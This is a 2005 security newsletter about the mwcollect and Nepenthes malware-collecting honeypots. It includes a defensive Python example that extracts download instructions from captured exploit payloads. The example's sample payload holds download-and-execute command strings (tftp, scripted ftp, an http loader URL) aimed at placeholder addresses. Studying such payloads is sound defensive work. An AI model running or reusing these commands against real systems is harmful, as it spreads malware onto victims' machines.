Security UPDATE -- Honeypots That Collect Malware -- August 31, 2005
isn at c4i.org
Thu Sep 1 05:15:51 EDT 2005
This email newsletter comes to you free and is supported by the
following advertisers, which offer products and services in which
you might be interested. Please take a moment to visit these
advertisers' Web sites and show your support for Security UPDATE.
A Robust Combination from Symantec
How to solve the anti-spam dilemma
1. In Focus: Honeypots That Collect Malware
2. Security News and Features
- Recent Security Vulnerabilities
- Vulnerabilities in PHP-based Libraries
- Secure Computing to Acquire CyberGuard
- EarthLink to Acquire Security Solutions Maker Aluria Software
3. Security Toolkit
- Security Matters Blog
4. New and Improved
- Pocket PC File Encryption
==== Sponsor: Symantec ====
A Robust Combination from Symantec
Staying on top of today's vulnerabilities and threats is one of the
most difficult, time-consuming, and even risky tasks facing IT
professionals like you. Never has it been so important to proactively
manage your IT environment. Fortunately, Symantec can help.
Symantec LiveState Patch Manager 6.0 helps keep your enterprise
devices secure and available by identifying known vulnerabilities and
then installing necessary patches on hundreds of systems in minutes,
not hours. That includes mobile and remote devices, too.
For extra protection from threats that even the latest patches can't
address, there's Symantec Client Security 3.0. With its exclusive
intrusion prevention technology, Symantec Client Security 3.0
proactively protects systems against known and unknown exploits before
they can compromise your system, including spyware, adware, viruses,
and other malicious intrusions. Learn more at
==== 1. In Focus: Honeypots That Collect Malware ====
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net
For the last two weeks, I've written about proactive honeypots that seek
out malicious Web sites: two of them aren't available to the public, and
one you can download and run on your own network. If you missed either
of those articles, they're available on our Web site at the URLs below.
This week, I'll discuss two "passive" honeypots, that is, honeypots that
sit and wait for intrusion attempts to come to them.
Because honeypots present an attack surface to potential intruders,
they're useful for determining what sort of intrusion attempts are being
launched against your network. In some cases, they can capture intrusion
methods that even the most up-to-date Intrusion Detection Systems (IDSs)
don't yet have signatures for.
I recently learned about two new honeypots. The first is mwcollect (at
the URL below), which was released in April 2005 and is partially
funded by The Honeynet Project. Mwcollect is designed specifically to
collect malware, hence the "mw" prefix in its name. The tool runs on
Linux and OpenBSD and can also run under Cygwin, a Linux-like (POSIX)
environment that runs on Windows platforms.
Mwcollect is a little different from typical honeypots because it was
originally designed to collect bot software, but the current version
collects worms and other forms of malware that take advantage of the
vulnerabilities mwcollect emulates. According to the mwcollect Web
site, systems that run the tool can't be infected with the malware it
collects because of the way mwcollect operates internally: It binds to
specified ports, waits for an exploit attempt, scans the attacker's
traffic for shellcode, and tries to download whatever malware that
shellcode points to, rather than running the shellcode itself. (The
listener is still a network-exposed process parsing hostile input, so
run it unprivileged on a segregated network segment.) Captured malware
can then be added to a database at the mwcollect Web site.
The next version of mwcollect will offer three levels of network
interactivity. The first level is the one I describe above. The second
level will passively analyze network traffic (like a sniffer in
promiscuous mode) and will try to download any malware it sees
referenced. The third and lowest level will also passively analyze
network traffic but won't try to download anything. You can learn a
little more about the tool at the Web site, and join the project's
Internet Relay Chat (IRC) channel for further discussion.
The second new honeypot, Nepenthes, was released earlier this month and
is similar to mwcollect. It too presents known vulnerabilities to the
network and waits for intrusion attempts. Current Nepenthes modules
emulate vulnerabilities in DCOM, the Local Security Authority Subsystem
Service (LSASS), WINS, ASN.1, NetBIOS, SQL Server, and many other
Microsoft services. Because Nepenthes runs on Linux systems, none of
those services is actually present, which means exploits against them
have little or no effect on the underlying OS.
Just like mwcollect, when Nepenthes detects an intrusion attempt, it
tries to download any related malware through a variety of methods,
including FTP, Trivial File Transfer Protocol (TFTP), and HTTP. Captured
malware is then sent to a central server hosted by the tool's developers.
The Nepenthes documentation doesn't explain what goes on under the
hood. But as best I can determine (I haven't actually installed the
tool yet), it captures shellcode exploits, looks for instructions that
try to download code from the Internet (which many types of malware
contain), and if it finds such instructions, proceeds to download the
malware in accordance with the intruder's intent. For example, if the
captured code instructs the system to use FTP to download a file,
Nepenthes will try to do that. I suspect that mwcollect works in a
similar fashion. Nepenthes doesn't appear to run on Windows platforms
under Cygwin, so you'll probably need a Linux-based system to put it to
use on your networks.
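The step both tools depend on, picking the download instruction out of a captured exploit and acting on it without ever running the shellcode, can be shown in a few dozen lines. What follows is an added example written for this article, not code from mwcollect or Nepenthes. It takes the raw bytes a passive listener received, pulls out the three fetch idioms common in 2005-era bot payloads (a bare URL, a Windows "tftp -i HOST GET FILE" one-liner, and an "echo ... >> script & ftp -s:script" session), and turns them into a fetch plan plus a content hash for the shared database. The sample payload, the addresses, and the file names are constructed; nothing is downloaded or executed.

```python
"""Pull download instructions out of a captured exploit payload.

Added example for this article, not code from mwcollect or Nepenthes.
Input is the raw bytes a passive listener received after an exploit
attempt; output is what a collector needs next: the fetches the payload
would perform and a content hash for the shared malware database.  The
payload is only parsed, never executed.  All addresses, file names and
the sample payload below are constructed for the example.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import asdict, dataclass

DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}

# A bare URL in the payload; stops at whitespace, NUL, quotes and shell metacharacters.
_URL_RE = re.compile(
    rb"(?P<scheme>https?|ftp)://(?P<host>[A-Za-z0-9.\-]+)"
    rb"(?::(?P<port>\d{1,5}))?(?P<path>/[^\s\x00\"'<>&|]*)?",
    re.IGNORECASE,
)
# Windows one-liner: tftp -i HOST GET REMOTEFILE [LOCALFILE]
_TFTP_RE = re.compile(
    rb"tftp\s+(?:-i\s+)?(?P<host>[A-Za-z0-9.\-]+)\s+get\s+(?P<file>[^\s\x00&|]+)",
    re.IGNORECASE,
)
# Scripted ftp.exe session assembled with "echo ... >> script":
# each "echo get FILE" belongs to the closest "echo open HOST [PORT]" before it.
_FTP_OPEN_RE = re.compile(
    rb"echo\s+open\s+(?P<host>[A-Za-z0-9.\-]+)(?:\s+(?P<port>\d{1,5}))?", re.IGNORECASE
)
_FTP_GET_RE = re.compile(rb"echo\s+get\s+(?P<file>[^\s\x00&|>]+)", re.IGNORECASE)


@dataclass(frozen=True)
class DownloadIntent:
    method: str  # "http", "https", "ftp" or "tftp"
    host: str
    port: int
    path: str    # URL path, or remote file name for ftp/tftp


def _text(b: bytes) -> str:
    return b.decode("ascii", "replace")


def extract_download_intents(payload: bytes) -> list[DownloadIntent]:
    """Return every fetch the payload would perform, in order of appearance, deduplicated."""
    found: list[tuple[int, DownloadIntent]] = []

    for m in _URL_RE.finditer(payload):
        scheme = _text(m["scheme"]).lower()
        port = int(m["port"]) if m["port"] else DEFAULT_PORTS[scheme]
        path = _text(m["path"]) if m["path"] else "/"
        found.append((m.start(), DownloadIntent(scheme, _text(m["host"]), port, path)))

    for m in _TFTP_RE.finditer(payload):
        found.append((m.start(), DownloadIntent("tftp", _text(m["host"]), 69, _text(m["file"]))))

    opens = [
        (m.start(), _text(m["host"]), int(m["port"]) if m["port"] else 21)
        for m in _FTP_OPEN_RE.finditer(payload)
    ]
    for g in _FTP_GET_RE.finditer(payload):
        earlier = [o for o in opens if o[0] < g.start()]
        if earlier:  # a "get" with no preceding "open" is not a fetch we can act on
            pos, host, port = earlier[-1]
            found.append((pos, DownloadIntent("ftp", host, port, _text(g["file"]))))

    found.sort(key=lambda item: item[0])
    return list(dict.fromkeys(intent for _, intent in found))


def capture_record(payload: bytes, source: str) -> dict:
    """One capture as a collector would log it before submitting to the central database."""
    return {
        "source": source,
        "sha256": hashlib.sha256(payload).hexdigest(),
        "size": len(payload),
        "intents": [asdict(i) for i in extract_download_intents(payload)],
    }


# Constructed sample: a NOP sled followed by three command-shell fetch idioms.
SAMPLE_PAYLOAD = (
    b"\x90" * 16
    + b"cmd /c tftp -i 192.0.2.10 GET bot.exe C:\\bot.exe & C:\\bot.exe\x00"
    + b"cmd /c echo open 198.51.100.7 2121 > o&echo user x x >> o&echo binary >> o"
    + b"&echo get update.exe >> o&echo quit >> o&ftp -n -s:o&update.exe\x00"
    + b"http://203.0.113.5:8080/loader.exe\x00"
)

if __name__ == "__main__":
    for intent in capture_record(SAMPLE_PAYLOAD, "192.0.2.200:445")["intents"]:
        print(f"{intent['method']} {intent['host']}:{intent['port']} {intent['path']}")
```

Everything here is string matching on the payload as received. Shellcode that decodes itself at run time (the common XOR-wrapped kind) won't show its URL to a pass like this until the decoder has been undone or emulated, which is the hard part of what the real tools do. Treat the extracted intents as something to fetch from an isolated host, never from the honeypot's production network.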
If you use honeypots, as so many administrators do these days, be sure
to take a closer look at mwcollect and Nepenthes.
We need your help! Windows IT Pro is launching its second Windows IT
Pro Industry Salary Survey, and we want to find out all about you and
what makes you a satisfied IT pro. When you complete the survey (about
10 minutes of your time), you'll be entered in a drawing for one of two
$300 American Express gift certificates. Look for the survey results--
and see how you stack up against your peers--in our December issue. To
take the survey, go to
==== Sponsor: Postini ====
How to solve the anti-spam dilemma
In this free white paper learn why older spam prevention
technologies using traditional content filtering don't work against the
latest spammer tactics - and why more corporate email administrators
are turning to a more accurate, more effective approach: managed email
security service. Find out how to achieve email security dynamically
with multiple layer protection ... minimize false positives ... cut
email administration costs (and hassles) ... and keep user communities
happy and productive. Download your free copy now.
==== 2. Security News and Features ====
Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
Vulnerabilities in PHP-based Libraries
Major security problems in two popular PHP (Hypertext Preprocessor)
libraries have led to the complete removal of a particular programming
function from those libraries. In June, problems were discovered in
libraries that provide XML-RPC support for PHP applications, both of
which are used by many applications today, including hugely popular
blog software packages. A subsequent code audit revealed still
Secure Computing to Acquire CyberGuard
Secure Computing announced that it will acquire CyberGuard. Under
the terms of the deal, Secure Computing will acquire all outstanding
shares of CyberGuard common stock and in turn give shares of its common
stock, as well as cash, to CyberGuard stockholders.
EarthLink to Acquire Security Solutions Maker Aluria Software
EarthLink and Aluria Software announced a deal in which EarthLink
will acquire the assets of Aluria, makers of the Spyware Eliminator
software. Terms of the deal, expected to close in September, weren't
==== Resources and Events ====
SQL Server 2005 Roadshow Is Coming to a City Near You
Get the facts about migrating to SQL Server 2005. SQL Server experts
will present real-world information about administration, development,
and business intelligence to help you implement a best-practices
migration to SQL Server 2005 and improve your database computing
environment. Attend and receive a 1-year membership to PASS and 1-year
subscription to SQL Server Magazine. Register now!
Consolidate Your SQL Server Infrastructure
Shared data clustering is the breakthrough consolidation solution
for Microsoft Windows servers. In this free Web seminar, learn how
shared data clustering technology can reduce capital expenditures by at
least 50 percent, improve management efficiency, reduce operational
expense, ensure high availability across all SQL Server instances, and
more! Find out how you can reduce the overall Total Cost of Ownership
(TCO) for SQL Server cluster deployments by as much as 60 percent over
three years! Sign up today!
High Risk Internet Access: Are You in Control?
Defending against Internet criminals, spyware, and phishing and
addressing the points of risk that Internet-enabled applications expose
your organization to can seem like an epic battle with Medusa. So how
do you take control of these valuable resources? In this free Web
seminar, you'll get the tools you need to help you analyze the impact
Internet-based threats have on your organization and tools to aid you
in the construction of Acceptable-Use Policies (AUPs).
Get Ready for SQL Server 2005 Roadshow in Europe
Back by popular demand--Get the facts about migrating to SQL Server
2005! SQL Server experts will present real-world information about
administration, development, and business intelligence to help you
implement a best-practices migration to SQL Server 2005 and improve
your database-computing environment. Receive a 1-year membership to
PASS and 1-year subscription to SQL Server Magazine. Register now!
Discover SQL Server 2005 for the enterprise. Are you prepared?
In this free, half-day event, you'll learn how the top new features
of SQL Server 2005 will help you create and manage large-scale,
mission-critical, enterprise database applications--making your job
easier. Find out how to leverage SQL Server 2005's new capabilities to
best support your business initiatives. Register today!
All high availability solutions are not created equal--how does yours
In this free Web seminar, you'll get the tools you need to ensure
your systems aren't going down. You'll discover the various categories
of high availability and disaster recovery solutions available and the
pros and cons of each. You'll learn what solutions help you take
preemptive, corrective action without resorting to a full system
failover, or in extreme cases, that perform a nondisruptive, automatic
switchover to a secondary server.
==== Featured White Paper ====
The Impact of Disk Defragmentation
Nearly every IT professional has a fragmentation horror story--in
which fragmentation severely degraded performance so that systems were
unusable. In this free white paper, learn what impact fragmentation has
on users and system activities and discover how quickly fragmentation
accumulates as a result of these activities. Plus get the
recommendations you need to manage the frequency of defragmentation
across your infrastructure.
==== 3. Security Toolkit ====
Security Matters Blog: Wi-Fi Security Is Better Than I Expected
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=1264F:4FB69
There's a lot of talk about the need for increased Wi-Fi security. I
was surprised at what I found when I did a little "war driving" in my
by John Savill, http://list.windowsitpro.com/t?ctl=1264E:4FB69
Q: I created a custom .adm file and imported it into a Group Policy
Object's (GPO's) Administrative Templates. Why can't I see any of the
settings in Group Policy Editor (GPE)?
Find the answer at
==== Announcements ====
(from Windows IT Pro and its partners)
Stay Up-To-Date with the Windows IT Security Newsletter
Each new issue of the Windows IT Security newsletter features
related product coverage of the best security tools available and
expert advice on the best way to implement various security components.
We've also expanded our security content to include even more
fundamentals on building and maintaining a secure enterprise. In
addition, paid subscribers get online access to our entire online
security article database (over 1900 articles)! Subscribe today:
VIP Monthly Online Pass = Quick Security Answers!
Sign up today for your VIP Monthly Online Pass and get 24/7 access
to the entire online article database, including exclusive, subscriber-
only Windows IT Security newsletter content. That's a database of over
1900 security articles to help you get all the answers you need, when
you need them. Sign up now:
==== 4. New and Improved ====
by Renee Munshi, products at windowsitpro.com
Pocket PC File Encryption
Infotecs offers ViPNet Safe Disk for Pocket PC, which encrypts and
password-protects sensitive files on PDAs. Data is protected even when
the device is switched off or in standby mode. You can open and edit
any file from a secure folder in a word processor or database program--
the file is automatically decrypted when opened and encrypted when
saved. ViPNet Safe Disk for Pocket PC supports two 256-bit encryption
algorithms: Advanced Encryption Standard (AES) and Government Standard
(GOST). The interface is specially designed to help PDA users manage
protected files and folders with just a few taps. You can exchange
protected data with a PC that's running ViPNet Safe Disk. ViPNet Safe
Disk for Pocket PC runs under Windows Mobile 2003 and costs $26.40 for
a single-user license. For more information, go to
Tell Us About a Hot Product and Get a T-Shirt!
Have you used a product that changed your IT experience by saving
you time or easing your daily burden? Tell us about the product, and
we'll send you a T-shirt if we write about the product in a future
Windows IT Pro What's Hot column. Send your product suggestions with
information about how the product has helped you to
whatshot at windowsitpro.com.
Editor's note: Share Your Security Discoveries and Get $100
Share your security-related discoveries, comments, or problems and
solutions in the Windows IT Security print newsletter's Reader to
Reader column. Email your contributions (500 words or less) to
r2rwinitsec at windowsitpro.com. If we print your submission, you'll
get $100. We edit submissions for style, grammar, and length.
==== Sponsored Links ====
Professional and secure remote control from all major platforms
Argent Versus MOM 2005
Experts Pick the Best Windows Monitoring Solution
Tech jobs at Dice
Search 65K+ new IT jobs daily--Tech expert jobs at top companies!
==== Contact Us ====
About the newsletter -- letters at windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=12650:4FB69
About product news -- products at windowsitpro.com
About your subscription -- windowsitproupdate at windowsitpro.com
About sponsoring Security UPDATE -- salesopps at windowsitpro.com
This email newsletter is brought to you by Windows IT Security,
the leading publication for IT professionals securing the Windows
enterprise from external intruders and controlling access for
internal users. Subscribe today.
Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2005, Penton Media, Inc. All rights reserved.